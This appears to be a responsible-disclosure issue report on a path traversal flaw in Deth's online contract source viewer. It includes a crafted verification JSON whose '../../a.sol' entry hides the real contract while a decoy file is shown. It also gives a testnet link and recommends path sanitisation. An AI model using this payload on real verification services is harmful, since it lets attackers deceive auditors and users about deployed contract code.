Path Traversal Issue in Deth Online Vscode Source Code Viewer #99
Description
Path Traversal Issue in Deth Online Vscode Source Code Viewer
Introduction
A path traversal Issue (../ file path issue) has been discovered in Deth's Vscode-based online source code viewer. This Issue allows attackers to shift verification paths to upper directories, thereby hiding specific real contract source files. This results in a source code forgery Issue, potentially enabling attackers to deceive users and auditors during contract verification.
By constructing a specially crafted JSON file for source code verification, an attacker can exploit flaws in Deth's directory handling mechanism. This causes the actual source file ../../a.sol to be overwritten and hidden while displaying the fake malicious source file a.sol in the directory.
Using this Issue, attackers can replace verified contract code with malicious code, potentially misleading auditors or users into believing they are reviewing the legitimate source code.
Example JSON
Below is an example JSON file demonstrating the Issue:
{
"language": "Solidity",
"sources": {
"a.sol": {
"content": "// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.7.0 <0.9.0;
contract Owner {
address private Hacker;
function bad(address newOwner) public {
Hacker = address(0x0);
}
}"
},
"../../a.sol": {
"content": "// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.7.0 <0.9.0;
contract Owner {
address private owner;
function changeOwner(address newOwner) public {
owner = newOwner;
}
}"
}
},
"settings": {}
}By submitting this crafted JSON file, the actual source file ../../a.sol is concealed, while the fake file a.sol with malicious code is displayed in the directory.
Below are links illustrating the exploitation:
https://sepolia.etherscan.deth.net/address/0xb7e278f0116508c611f8a486666d3823e51c44dc
Recommendations
- Implement strict path sanitization to prevent the use of
../for directory traversal.
We also find same issue in Forge, Metasuite, Blockscan and crytic-based tools like Slither. so this is a common issue for code fetcher tool but we also think this is a risky issue need to did some better pratice.
Thank you very much for providing such a powerful tool, it's a great convenience for us and hopefully this discovery will allow me to contribute something to the tool.